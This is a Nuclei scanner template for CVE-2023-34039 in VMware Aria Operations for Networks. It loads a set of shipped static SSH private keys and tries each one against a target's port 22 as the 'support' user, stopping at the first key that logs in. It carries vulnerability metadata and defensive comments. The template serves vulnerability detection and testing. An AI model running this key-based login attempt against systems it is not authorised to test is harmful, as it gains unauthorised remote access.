
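# Nuclei template (javascript protocol) for CVE-2023-34039.
# The page had lost all indentation; flush-left `info:`, `javascript:` and the
# block scalars do not parse as the intended nested mapping, so the structure is
# restored here at the conventional 2-space indent.
id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    # CWE-327 here reflects the root cause: a static, shipped SSH key pair,
    # not a protocol weakness in SSH itself.
    cwe-id: CWE-327
    epss-score: 0.9013
    epss-percentile: 0.98721
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023

variables:
  # Directory holding the known static private keys that the check tries.
  # Presumably resolved relative to the templates root (nuclei's helpers
  # convention) — confirm against the installed templates layout.
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # init field can be used to make any preparations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  # The 'keys' payload below is replaced wholesale by the contents of keysDir;
  # the dummy entries only exist so the payload set is non-empty before init runs.
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)
    # check if port is open before bruteforcing
    # Skips the key iteration entirely when the SSH port is closed, which keeps
    # the scan quiet against hosts that cannot be affected.
    pre-condition: |
      isPortOpen(Host,Port)
    # actual exploit
    # One key-based authentication attempt per payload entry; a successful
    # connect with any of the shipped keys is the finding. On the target this
    # shows up as repeated public-key auth attempts for the same user from one
    # source within a short window, which is the host-side signal to alert on.
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
    args:
      Host: "{{Host}}"
      # Port is quoted deliberately: a plain 22 would be an int, and a
      # two-part value such as 22:22 would hit the YAML 1.1 sexagesimal trap.
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    # Concurrency across payload entries; stop-at-first-match ends the
    # iteration as soon as one key authenticates, so no further keys are sent.
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          # success: the script ran without error; response: ConnectWithKey
          # returned a truthy result, i.e. authentication with a static key worked.
          - success && response
# NOTE(review): the digest below is the template's signature over the original
# content; any edit to this file (including the comments above) presumably
# invalidates it and the template must be re-signed before nuclei will trust it.
# digest: 490a0046304402201da4af1970ef660328802156d24666f3647840a613923e148505bef19fa7a8290220681a803ee805707a7813421b593a416d308a17725886fa72283205b48cf1fd53:922c64590222798bb761d5b6d8e72950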